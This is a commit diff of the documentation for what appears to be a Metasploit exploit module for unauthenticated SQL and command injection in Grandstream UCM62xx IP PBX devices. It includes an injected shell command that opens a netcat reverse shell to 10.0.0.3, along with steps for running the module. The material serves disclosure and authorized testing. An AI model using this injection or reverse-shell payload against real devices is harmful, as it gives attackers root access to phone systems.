Addressed multiple review comments (spelling, doc details, randomization, etc)
This commit is contained in:
Jake Baines
@@ -2,21 +2,35 @@
|
||||
|
||||
### Description
|
||||
|
||||
This module exploits unauthenticated SQL and command injection vulnerabilities affecting
|
||||
the Grandstream UCM62xx IP PBX series of devices. The vulnerabilities allow an
|
||||
unauthenticated and remote attacker to execute commands as root. This module affects
|
||||
UCM62xx versions before firmware version 1.0.19.20.
|
||||
This module exploits an unauthenticated SQL injection vulnerability (CVE-2020-5722) and
|
||||
a command injection vulnerability (technically, no assigned CVE but was inadvertently
|
||||
patched at the same time as CVE-2019-10662) affecting the Grandstream UCM62xx IP PBX
|
||||
series of devices. The vulnerabilities allow an unauthenticated and remote attacker to
|
||||
execute commands as `root`.
|
||||
|
||||
Exploitation happens in two stages:
|
||||
|
||||
1. An SQL injection during username lookup while executing the "Forgot Password" function.
|
||||
2. After successful SQL injection the user provided username is passed to a python script
|
||||
via the shell. Like so:
|
||||
|
||||
```
|
||||
/bin/sh -c python /app/asterisk/var/lib/asterisk/scripts/sendMail.py \
|
||||
password '' `cat <<'TTsf7G0' z' or 1=1--`;`nc 10.0.0.3 4444 -e /bin/sh`;` TTsf7G0 `
|
||||
```
|
||||
|
||||
This module affect UCM62xx versions before firmware version 1.0.19.20.
|
||||
|
||||
### Installation
|
||||
|
||||
The UCM62xx PBX is a physical device and is not known to be succesfully emulated.
|
||||
The UCM62xx PBX is a physical device and is not known to have been successfully emulated.
|
||||
However, if you have a device, affected firmware can be downloaded here:
|
||||
|
||||
* https://firmware.grandstream.com/Release_UCM62xx_1.0.18.13.zip
|
||||
|
||||
## Verification Steps
|
||||
|
||||
* Acquire an affected device and configure with affected firmware
|
||||
* Acquire an affected device and configure it with the affected firmware
|
||||
* Do: `use exploit/linux/http/grandstream_ucm62xx_sendemail_rce`
|
||||
* Do: `set RHOST <ip>`
|
||||
* Do: `check`
|
||||
@@ -30,11 +44,11 @@ However, if you have a device, affected firmware can be downloaded here:
|
||||
|
||||
### 0
|
||||
|
||||
By default, this targets the PBX with the `reverse_netcat_gaping` payload and returns a reverse shell.
|
||||
This targets the PBX with the `reverse_netcat_gaping` payload and returns a reverse shell.
|
||||
|
||||
### 1
|
||||
|
||||
By default, this target obtains a meterpreter session using `wget`.
|
||||
This target obtains a meterpreter session using `wget`.
|
||||
|
||||
## Options
|
||||
|
||||
@@ -103,7 +117,7 @@ Revision : 63015
|
||||
Serial : 1126b9d4eacb275c
|
||||
```
|
||||
|
||||
### Grandstream UCM6202 IP PBX fimrware version 1.0.18.13. Get reverse shell using netcat.
|
||||
### Grandstream UCM6202 IP PBX firmware version 1.0.18.13. Get reverse shell using netcat.
|
||||
|
||||
```
|
||||
msf6 > use exploit/linux/http/grandstream_ucm62xx_sendemail_rce
|
||||
|
||||
Reference in New Issue
Block a user